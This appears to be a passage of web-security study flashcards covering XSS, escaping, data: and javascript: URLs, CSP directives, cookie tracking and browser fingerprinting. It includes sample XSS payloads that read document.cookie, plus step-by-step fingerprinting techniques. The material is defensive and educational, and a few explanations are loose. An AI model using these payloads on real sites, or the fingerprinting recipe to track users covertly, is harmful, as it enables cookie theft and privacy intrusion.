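  return `${callbackName}(${json});`;
}

const body = jsonpResponseBody("handleUser", { name: "Alice" });
console.log(body);

// Simulate the consuming page: running the script calls its callback.
let received = null;
new Function("handleUser", body)((user) => { received = user; });
console.log(received);
```

The last lines also show the trust problem: whatever the provider returns is executed as code on the consuming page.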
What is XSS?
XSS stands for Cross Site Scripting
It is a code injection vulnerability, specifically of JavaScript into an HTML document
What is a code injection vulnerability?
It is a vulnerability caused when untrusted user data unexpectedly becomes code.
Any code that combines a command with user data is susceptible to code injection.
Examples of code injection are:
- XSS (Cross Site Scripting) - Code injection where the unexpected code is Javascript into an HTML document
- SQL Injection - Code injection where the unexpected code is extra SQL commands included in a SQL query string.
What is an example of XSS in action?
Whenever a GET request is made to the server, you can insert a script string instead of an actual value for a query parameter (a Reflected XSS). Example:
http://www.wordpress.com?search=<script>(function() {console.error('You have been hacked!!!')})();</script>
In this case, depending on how the site is built, this could be enough for an XSS attack
How can we mitigate XSS attacks?
By making sure we sanitize any string we get from the client.
The rule is never trust the client.
What is Reflected XSS?
It’s the XSS where the attacker places the code in the HTTP request itself.
The goal of the attacker for this case will be to find a URL on the site that he can target and that will process the included code.
The limitation is that the attack code must be added to the URL path or query parameters.
What is Stored XSS?
It’s the XSS where the attacker places the code and persists it into the database. Once there, the server will include said code in all pages sent to clients.
The goal of the attacker is to get the code into the database by any means necessary.
How would an XSS attack on an image attribute work?
If an attribute value depends on user input, this could happen.
Example:
<img src='avatar.png' alt='USER_DATA_HERE' />
attacked with this code
ending' onload='alert(document.cookie)
will end up looking like this:
<img src='avatar.png' alt='ending' onload='alert(document.cookie)' />
What does the string sanitization that protects a codebase from XSS attacks consist of?
It replaces special characters with HTML entities, so the browser displays them as text instead of interpreting them as markup.
For example, if someone tries to inject code in the place of VALUE:
http://www.wordpress.com?search=VALUE
attacked with this code:
<script>alert('Hacked')</script>
or
<img src='avatar.png' alt='VALUE' />
attacked with this code:
ending' onload='alert(document.cookie)
The sanitization process will replace the following characters:
“<” with &lt;
“&” with &amp;
“'” with &apos;
“"” with &quot;
&lt; stands for “less than”; it tells the browser to print the “less than” character as plain text instead of treating it as the start of a tag.
&amp; stands for “ampersand”
&apos; stands for “apostrophe” (single quote)
&quot; stands for “quotation mark” (double quote)
Therefore the final strings will be:
&lt;script>alert(&apos;Hacked&apos;)&lt;/script>
<img src='avatar.png' alt='ending&apos; onload=&apos;alert(document.cookie)' />
Which is enough to keep the injected code from executing.
Sanitization functions can be custom made, but most libraries already provide functions for this purpose.
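A minimal sketch of such an escaping function, replacing the special characters with the entities &lt;, &amp;, &apos; and &quot;. The name escapeHtml is an assumption, and escaping ">" as &gt; is an extra precaution that the card above does not list.

```javascript
// Escape the characters that let user data break out of HTML text or a
// quoted attribute value. "&" is replaced first so that the entities
// produced by the later replacements are not escaped a second time.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/'/g, "&apos;")
    .replace(/"/g, "&quot;");
}

const safeText = escapeHtml("<script>alert('Hacked')</script>");
const safeAttr = escapeHtml("ending' onload='alert(document.cookie)");
console.log(safeText);
console.log("<img src='avatar.png' alt='" + safeAttr + "' />");
```

In real projects a well-tested library function is usually a better choice than a hand-written one.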
What HTML style cannot be protected by the sanitization process (escaping the string) and is therefore even more vulnerable to XSS attacks?
HTML attributes without quotes.
In HTML these 3 styles are valid:
Double quotes, single quotes, and no quotes
<img src="avatar.png" alt="USER_DATA_HERE" />
<img src='avatar.png' alt='USER_DATA_HERE' />
<img src=avatar.png alt=USER_DATA_HERE/>
An unquoted value ends at the first space, so an attacker can add new attributes without using any of the escaped characters. It is therefore highly recommended to avoid the no-quotes style.
What are some attributes that are not safe even if you escape the attribute value?
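src and href, because they accept URLs such as data: and javascript: URLs, which can carry code without using any character that escaping would change.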
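Because escaping does not help for these attributes, one common approach is to check the URL scheme against an allowlist before using the value. A minimal sketch, assuming only absolute http and https URLs should be accepted (isSafeUrl is a hypothetical name, and relative URLs are rejected here for simplicity):

```javascript
// Accept only absolute http(s) URLs for src/href values.
function isSafeUrl(untrusted) {
  let url;
  try {
    url = new URL(untrusted); // throws on anything that is not an absolute URL
  } catch {
    return false;
  }
  return url.protocol === "http:" || url.protocol === "https:";
}

console.log(isSafeUrl("https://example.com/avatar.png"));
console.log(isSafeUrl("javascript:alert('hi')"));
console.log(isSafeUrl("data:text/html,<h1>A header</h1>"));
```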
What are data URLs?
URLs prefixed with the data: scheme
They are a type of URI used for embedding small documents directly within a web address.
Commonly used to encode small images such as logos and embed them in HTML.
What are the advantages of using data URLs?
Data URLs include the data for a resource directly in the document that references it, so the client does not have to request the resource separately. This avoids the overhead of additional requests and connections.
What are some disadvantages of using data URLs?
They increase the overall size of the HTML document sent over HTTP.
Also, a data URL is not cached as a separate resource, so its content may be downloaded repeatedly, depending on the caching parameters of the HTML document it is embedded in.
Additionally, content provided through a data URL can be a vector for XSS attacks.
What is an example of a data url?
data:text/html, <h1>A header</h1>
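Binary or special characters are usually base64-encoded inside a data URL. A minimal sketch of building one, assuming Node's global Buffer is available (toDataUrl is a hypothetical helper name):

```javascript
// Build a base64 data URL from a MIME type and a text payload.
function toDataUrl(mimeType, text) {
  const base64 = Buffer.from(text, "utf8").toString("base64");
  return "data:" + mimeType + ";base64," + base64;
}

const dataUrl = toDataUrl("text/html", "<h1>A header</h1>");
console.log(dataUrl);
```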
What are javascript URLs?
URLs prefixed with the javascript: scheme
They are used as fake navigation targets that execute JavaScript when the browser attempts to navigate. If the URL evaluates to a string, it is treated as HTML and rendered by the browser.
They let you run JavaScript in the context of the page you’re in.
What is an example of a javascript URL?
javascript:alert('hi')
What are some actual use cases for data and javascript URLs?
As a legacy way to run JavaScript in response to a click:
<a href="javascript:alert('hi')">Say Hi</a>
To save an HTTP request in an HTML page:
(This makes sense for a small image that should load with the first response)
<img src="data:image/png;base64,iVBorw…" />
To save an HTTP request in a CSS file:
(This makes sense for a small image that should load with the first response)
body {
background-image: url(data:image/png;base64,iVBorw…);
}
What does injecting down mean in an XSS attack?
It means creating a new nested context inside the current one, for example starting JavaScript inside an HTML attribute.
What does injecting up mean in an XSS attack?
It means ending the current context to get into a higher context.
What is the goal of the idea of “Defense-in-depth”?
To provide redundancy in case security controls fail, or a vulnerability is exploited.
Meaning we should implement many different layers of defense even if they are redundant and achieve the same goal.
How can you defend the user’s cookies from being read from Javascript in the user’s browser?
With the HttpOnly cookie attribute which is configured from the app’s server.
Set-Cookie: key=value; HttpOnly
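A minimal sketch of building that header value on the server. The function name httpOnlyCookie and the Path=/ attribute are assumptions added for illustration.

```javascript
// Build a Set-Cookie header value. The HttpOnly attribute keeps the
// cookie out of document.cookie, so injected scripts cannot read it.
function httpOnlyCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly`;
}

const cookieHeader = httpOnlyCookie("sessionId", "abc123");
console.log("Set-Cookie: " + cookieHeader);
```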
What does CSP stand for?
Content Security Policy
What is the use of a Content Security Policy?
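It is the inverse of the Same Origin Policy.
The Same Origin Policy stops other sites from reading our site's data, while the Content Security Policy stops our own page from loading resources from, or sending requests to, sources we have not allowed.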
How can you implement Content Security Policy on your site?
Add the Content-Security-Policy header to an HTTP response to control the resources the page is allowed to load.
Example:
Content-Security-Policy: default-src 'self'
What does the simplest Content-Security-Policy header mean?
Content-Security-Policy: default-src 'self'
This means the page may only load resources from its own origin.
Additionally, it prevents inline code (inline scripts and styles) from executing.
What does a Content Security Policy header look like that allows all resources from our own site, including our subdomains, but blocks resources from anywhere else, and also allows images from anywhere?
Content-Security-Policy: default-src 'self' *.mailsite.com; img-src *
(This assumes that our site is served from mailsite.com, so *.mailsite.com matches its subdomains)
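A policy is just a list of directives separated by semicolons, each followed by its allowed sources. A minimal sketch of assembling the header value from an object (buildCsp is a hypothetical helper, not part of any library):

```javascript
// Turn { directive: [sources...] } into a CSP header value.
function buildCsp(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => `${name} ${sources.join(" ")}`)
    .join("; ");
}

const policy = buildCsp({
  "default-src": ["'self'", "*.mailsite.com"],
  "img-src": ["*"],
});
console.log("Content-Security-Policy: " + policy);
```

Keeping the policy as data makes it easier to review which sources each directive allows.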
Is there a way to test Content Security Policy headers before deploying to production, to check that you are not blocking any resource your site needs?
Yes, you can use the report-only mode.
Instead of using the Content-Security-Policy header you should use this header:
Content-Security-Policy-Report-Only: policy_rules_here
With a reporting endpoint configured (for example with report-uri), the browser reports every resource that would have been blocked. However the CSP itself is not enforced, so in practice nothing is blocked. This way you can make sure that your CSP will not break your site.
Is there a way to enable reports for Content-Security-Policy while it is in production blocking unwanted resources?
Yes, you can enable policy violation reports
Content-Security-Policy: default-src 'self'; report-uri https://example.com/report
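The only difference between trial mode and enforcement is the header name. A minimal sketch, where cspHeader is a hypothetical helper and the report URL is the placeholder from the card above:

```javascript
// Pick the header name by mode; the policy text is the same in both.
function cspHeader(policy, reportUrl, enforce) {
  const name = enforce
    ? "Content-Security-Policy"
    : "Content-Security-Policy-Report-Only";
  return { name, value: `${policy}; report-uri ${reportUrl}` };
}

const trial = cspHeader("default-src 'self'", "https://example.com/report", false);
const live = cspHeader("default-src 'self'", "https://example.com/report", true);
console.log(trial.name + ": " + trial.value);
console.log(live.name + ": " + live.value);
```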
What are the most common Content Security Policy fetch directives that inherit from the fetch directive “default-src”?
default-src
connect-src
font-src
frame-src
img-src
manifest-src
media-src
object-src
script-src
style-src
worker-src
What does the Content Security Policy fetch directive “default-src” do?
Serves as a fallback for the other fetch directives.
What does the Content Security Policy fetch directive “connect-src” do?
Restricts sources for “script interfaces” like: fetch, XHR, WebSocket, EventSource, Navigator.sendBeacon(), <a ping>
What does the Content Security Policy fetch directive “font-src” do?
Restricts sources for fonts
What does the Content Security Policy fetch directive “frame-src” do?
Restricts sources for nested browsing contexts like: <frame> and <iframe>
What does the Content Security Policy fetch directive “img-src” do?
Restricts sources for images and favicons
What does the Content Security Policy fetch directive “manifest-src” do?
Restricts sources for app manifest files
What does the Content Security Policy fetch directive “media-src” do?
Restricts sources for media like: <audio>, <video> and <track>
What does the Content Security Policy fetch directive “object-src” do?
Restricts sources for legacy plugins: <object>, <embed> and <applet>
What does the Content Security Policy fetch directive “script-src” do?
Restricts sources for <script> elements
What does the Content Security Policy fetch directive “style-src” do?
Restricts sources for <style> and <link rel="stylesheet"> elements
What does the Content Security Policy fetch directive “worker-src” do?
Restricts sources for Worker, SharedWorker and ServiceWorker
What are some common Content Security Policy directives that do not inherit the value set in the directive “default-src”?
base-uri
form-action
frame-ancestors
navigate-to
upgrade-insecure-requests
What does the Content Security Policy directive “base-uri” do?
It restricts the URLs that can be used in the <base> element
What does the Content Security Policy directive “form-action” do?
It restricts the URLs that can be used as the target of a form submission
What does the Content Security Policy directive “frame-ancestors” do?
It restricts the parents which may embed this page using <frame> or <iframe>
What does the Content Security Policy directive “navigate-to” do?
It restricts the URLs to which a document can initiate navigation by any means
What does the Content Security Policy directive “upgrade-insecure-requests” do?
It instructs the browser to transparently treat all of the site's HTTP URLs as their HTTPS equivalents
What is the HTML tag <base> used for?
Like the <a> tag, it specifies a URL. But the URL specified in <base> is used as the base for all relative URLs in the document.
Example:
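<!DOCTYPE html>
<html>
<head>
<base href="https://example.com/images/" />
</head>
<body>
<img src="logo.png" alt="Logo" />
</body>
</html>
(The href and src values are placeholders; the image is loaded from https://example.com/images/logo.png)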
What is the most common problem with Content Security Policy in real world scenarios?
In web development, websites often use code from other sources (3rd party libraries).
Very often these 3rd party libraries use other 3rd party libraries as well.
This means that if you try to apply a whitelist of allowed URLs, you also have to include your dependencies, the dependencies of your dependencies, and so on.
Depending on the size of your site, this makes the policy extremely fragile. It only takes one script in your dependency tree starting to use another library to break your site and require a new CSP update.
What is the solution to the CSP problem where, if you try to whitelist all dependencies, you eventually end up blocking some needed ones or trusting some dangerous ones?
You can use the “strict-dynamic” keyword together with nonces
What does the CSP keyword “strict-dynamic” do?
The server generates a random nonce for every response and puts it both in the script-src directive and in a nonce attribute on each script tag it trusts.
Scripts carrying the right nonce are allowed to run, and with “strict-dynamic” that trust automatically extends to the scripts they load themselves. Scripts without the nonce are blocked, and host whitelists in the policy are ignored.
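A minimal sketch of the nonce flow, assuming Node's built-in crypto module. The helper names and the /app.js path are hypothetical.

```javascript
const crypto = require("crypto");

// A fresh, unpredictable nonce must be generated for every response.
function newNonce() {
  return crypto.randomBytes(16).toString("base64");
}

// The same nonce goes into the header and into each trusted script tag.
function renderPage(nonce) {
  return {
    header: `script-src 'nonce-${nonce}' 'strict-dynamic'`,
    body: `<script nonce="${nonce}" src="/app.js"></script>`,
  };
}

const nonce = newNonce();
const page = renderPage(nonce);
console.log("Content-Security-Policy: " + page.header);
console.log(page.body);
```

Reusing a nonce across responses would let an attacker who has seen it once mark injected scripts as trusted.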
What are the Feature-Policy HTTP headers?
Policies that allow you to selectively disable browser features. Some of them include:
geolocation
autoplay
vertical-scroll
What is DOM-based XSS?
It is the attack where attacker-controlled data reaches the page's own script, which is tricked into adding attacker nodes to the DOM.
Unlike reflected or stored XSS, the attacker doesn’t change the HTML rendered by the server. Instead the page is attacked at “runtime”.
How can one guard against DOM-based XSS?
Never pass untrusted data to the innerHTML property.
Use the textContent property instead.
Another solution is to use the “trusted-types” CSP directive.
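The difference between the two properties can be sketched as follows. In a browser, element would be a real DOM node; here a plain object stands in for it (an assumption) so the sketch also runs outside a browser.

```javascript
// Safe: the untrusted string is stored as plain text, never parsed as HTML.
function showComment(element, untrustedText) {
  element.textContent = untrustedText;
}

// Unsafe counterpart, shown only for contrast: a browser would parse the
// string as HTML and run the onerror handler.
function showCommentUnsafe(element, untrustedText) {
  element.innerHTML = untrustedText;
}

// Stand-in for a DOM node (assumption, not a real element).
const fakeElement = { textContent: "", innerHTML: "" };
showComment(fakeElement, "<img src=x onerror=alert(document.cookie)>");
console.log(fakeElement.textContent);
```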
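What does the CSP directive “trusted-types” do?
Together with require-trusted-types-for 'script', it makes the browser reject plain strings in dangerous DOM sinks such as innerHTML. Only values produced by a policy function that you register, and that validates or sanitizes the input, are accepted.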
Why did tracking emerge as a concern on the web?
It all started because of marketers. Even in the era before the internet, companies were trying to track people in order to match their sales efforts with potential customers.
When the internet became widely adopted, websites started using iframes to share the user's available data with marketing servers, which would then pick the best possible ad match to return to the iframe.
What is the technology that allows people to track others across websites?
Cookies + 3rd party resources
Why were the cookies set up as a way to enable 3rd parties to track users?
They weren’t. That was not the purpose.
This is a consequence of a couple of decisions made beforehand.
Web 0.0 needed a way to log in and authenticate users to a website securely. Thus the idea of tokens came up and cookies were born.
On the other hand, in the 90s hosting was extremely expensive, so several websites hosting the same image cost a non-trivial amount of money. So the idea came up to share pictures across domains, which involved making a request to another site to get those images. As a rushed decision, cookies were included in that request.
The creation of the cookies and the behavior of including them in the requests came with the consequence of enabling tracking.
Why were cookies created?
Web 0.0 needed a way to log in and authenticate users to a website securely. Thus the idea of tokens came up and cookies were born.
What happened after the tracking behavior was noticed by the tech community?
Some browsers, like Safari, Firefox and Brave, started fighting back by blocking 3rd party cookies.
As a response, tracker sites started moving the information they kept in cookies to other places: query params, local storage, etc.
What is the difference between classic tracking and fingerprinting (passive tracking)?
With classic tracking:
- Website stores an id on the client.
- The client returns the id to the server (either via cookies or via JS)
- The id is what allows re-identification
With fingerprinting/passive tracking:
- Website finds things that are different about each visitor.
- The differences are what allows for re-identification.
What are some ways that fingerprinting is done?
By taking notice of several semi-identifiers, such as:
- Browser size
- Extra fonts
- Audio hardware
- Video hardware
- Installed plugins
- Color Depth
- User Agent String (Header)
- Canvas / WebGL
- Window height and width
Amongst others
What are the 2 things that determine the success rate of fingerprinting?
- The breadth of fingerprints.
- The depth of fingerprints.
What is the breadth of fingerprints (in a fingerprinting context)?
It refers to the number of semi-identifiers available to perform fingerprinting.
What is the depth of fingerprints (in a fingerprinting context)?
It refers to the degree of uniqueness each identifier can provide.
How can one extract the User Agent string header to use as a semi-identifier for fingerprinting?
You can read it easily from JavaScript:
- navigator.userAgent
What are the 3 categories of fonts?
System
Local
Web
What are fonts that belong to the system category?
They are the fonts provided by the OS, whether it's Windows, Mac, Linux, etc.
What are fonts that belong to the web category?
They are the fonts the webpage instructs the browser to use. Sometimes they are loaded from a 3rd party source and sometimes they are served by the same web server.
What are fonts that belong to the local category?
They are the fonts that the user has explicitly installed
Which one of the 3 categories of fonts is the one that is used for fingerprinting?
Local fonts
How can one extract the Local Fonts as a semi-identifier for fingerprinting?
There isn’t a direct way of doing it. However it can be done with the following steps:
- Set up or get the list of fonts to test with
- Set up a span tag with text inside (or any other element).
- Apply the font to the span
- Measure the width of the span
- If the width changes compared to the fallback font, it means the user has that font available on their system.
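The steps above can be sketched as follows. The measuring function is passed in by the caller: in a browser it would set the span's font-family and return span.offsetWidth. The fakeMeasure stub and its widths are made-up stand-ins so the sketch runs outside a browser.

```javascript
// Return the candidate fonts whose rendered width differs from the
// width of the fallback font, which suggests they are installed.
function detectFonts(candidates, measureWidth, fallback = "monospace") {
  const baseline = measureWidth(fallback);
  return candidates.filter(
    (font) => measureWidth(`"${font}", ${fallback}`) !== baseline
  );
}

// Stub measurer (assumption): pretends one font is installed and
// renders the test text wider than the fallback does.
const installed = new Set(["Comic Sans MS"]);
const fakeMeasure = (family) => {
  const first = family.split(",")[0].replace(/"/g, "").trim();
  return installed.has(first) ? 120 : 100;
};

const found = detectFonts(["Comic Sans MS", "Made Up Font"], fakeMeasure);
console.log(found);
```

A font that happens to render the test text at the same width as the fallback would be missed, which is why real scripts tend to measure long strings.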
How does fingerprinting with Canvas / WebGL work?
With the canvas API you can set up some standardized drawings, read the rendered pixels back, and analyze them.
Depending on the browser and hardware, the result can be subtly different. Of course these differences aren’t visible to the naked eye.
How can you perform fingerprinting to detect hardware semi-identifiers?
Many Web APIs are known for leaking certain capabilities such as:
- number of cores (HTML)
- number of audio channels (Web Audio API)
- number of shaders and similar (WebGL API)
- device memory (Device Memory API)
- network (WebRTC, Network status API)
How can you extract the height and width information of the window for fingerprinting?
You can access it via JS with window.innerHeight and window.innerWidth.
However, in case that is not reliable enough, you can look at the distribution of the HTML elements on the page.
How can fingerprinting be implemented easily in practice?
Hash the value returned by each endpoint (each semi-identifier).
Hash those values into a single identifier.
Store the results in a database.
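A minimal sketch of combining the collected values into one identifier, assuming Node's built-in crypto module and SHA-256 as the hash (the card does not name a hash function). The attribute names and values are hypothetical.

```javascript
const { createHash } = require("crypto");

// Serialize the semi-identifiers in a stable key order, then hash the
// result so the same browser always maps to the same identifier.
function fingerprintId(attributes) {
  const canonical = Object.keys(attributes)
    .sort()
    .map((key) => `${key}=${String(attributes[key])}`)
    .join("\n");
  return createHash("sha256").update(canonical).digest("hex");
}

const visitorId = fingerprintId({
  userAgent: "ExampleBrowser/1.0",
  colorDepth: 24,
  fonts: "Comic Sans MS",
});
console.log(visitorId);
```

Sorting the keys keeps the identifier stable even if the values are collected in a different order on the next visit.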
What are some fingerprinting countermeasures?
- Remove unneeded functionality
- Make the functionality as consistent as possible.
- Restrict access and permissions .
- Noise randomization
What kind of functionality can you remove from your website in order to counter fingerprinting?
Delete JS endpoints
Remove the HTTP header
Remove the runtime capability
Remove API usage, like canvas
What kind of functionality can you try to make consistent in your website in order to counter fingerprinting?
Basically by removing unneeded functionality and restricting access and permissions.
What kind of functionality can you restrict access to in your website in order to counter fingerprinting?
Permission prompts to functionalities like video, audio, or geolocation access.
Give access only after certain user gestures. (User gestures are actions commonly performed by users. An example is the “I’m not a robot” prompt)
Give access only to a whitelist of 1st and 3rd parties.
What is steganography?
A technique that involves hiding information within an ordinary, non-secret file or message, so that it will not be detected.
How do you translate steganography into Spanish?
Esteganografía
How can you inject noise into fingerprinting semi-identifiers?
By using steganography.
You can change a specific bit or bits of every image. The users will not notice it, but the fingerprinting will fail because the image data no longer matches between reads.
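A minimal sketch of that idea: randomly flipping the least significant bit of pixel bytes, which changes each value by at most 1. The function name addPixelNoise and the 50% flip probability are assumptions.

```javascript
// Return a copy of the pixel bytes with the lowest bit of each byte
// flipped at random. The random source can be injected for testing.
function addPixelNoise(pixels, random = Math.random) {
  const noisy = Uint8ClampedArray.from(pixels);
  for (let i = 0; i < noisy.length; i++) {
    if (random() < 0.5) {
      noisy[i] ^= 1; // flip the least significant bit
    }
  }
  return noisy;
}

const original = [0, 255, 10, 200];
const noisy = addPixelNoise(original);
console.log(Array.from(noisy));
```

Because the noise differs on every read, a hash of the canvas output is no longer stable across visits.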